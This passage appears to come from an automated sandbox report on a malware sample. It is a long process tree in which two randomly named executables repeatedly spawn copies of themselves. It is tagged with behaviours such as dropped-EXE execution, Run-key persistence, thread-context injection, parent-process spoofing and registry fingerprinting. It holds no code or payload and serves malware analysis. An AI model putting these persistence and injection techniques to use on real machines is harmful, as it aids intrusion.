    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10496
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8664
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6568
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9932
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8320
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6532
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9616
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10432
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8628
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8464
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11236
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5356
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6356
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:756
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:3624
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8716
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:8256
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6088
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:4524
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8204
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9240
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6336
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5416
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:4092
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8612
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8612 -s 28
      4⤵
      Program crash
      PID:10508
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Checks BIOS information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8260
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10076
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6580
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:3672
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    - Adds Run key to start application
    PID:6388
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7644
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5392
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9056
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8964
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8804
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8980
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5272
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7028
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6404
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 28
      4⤵
      Program crash
      PID:1588
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10192
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10804
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:4188
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:2100
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10600
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:4800
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10600
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:6272
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:4400
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9352
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9544
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9808
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:2668
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11672 -s 28
      4⤵
      Program crash
      PID:12648
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12620
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13140
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12856
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:8372
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13288
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:204
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12724
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13188
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13244
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10100
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:5416
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7868
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12768
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:1716
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13320
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13836
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13384
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14036
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13548
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14064
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13668
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14296
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12596
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13136
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11612
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10224
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 13116 -s 28
      4⤵
      Program crash
      PID:12424
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14232
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13180
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12004
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11364
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11760 -s 28
      4⤵
      Program crash
      PID:1572
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11892
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:3308
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11332
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:10692
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13012
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11280
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9024
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:9132
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:4948
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:1492
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13264
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:11916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11916 -s 28
      4⤵
      Program crash
      PID:14468
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:2648
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14892
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:7272
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:15000
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14852
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:14556
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:12428
- - C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    C:\Users\Admin\Documents\6lSzGpKBNwPTtXTimMDJulCB.exe
    3⤵
    PID:13892
- C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
  "C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1936
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    PID:692
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    PID:5072
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    PID:5796
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    PID:3956
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    PID:6132
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Executes dropped EXE
    PID:664
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:132
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:232
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:5560
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6276
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6704
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6328
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6368
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6756
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6044
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7452
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6624
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7428
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7592
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    PID:5224
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:1068
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6668
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9168
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:1556
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:3332
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10108
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10060
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:9252
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:7012
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:6584
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:2456
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:852
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:3324
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:10072
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:1896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 28
      4⤵
      Program crash
      PID:9840
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:5572
- - C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe
    3⤵
    PID:8800
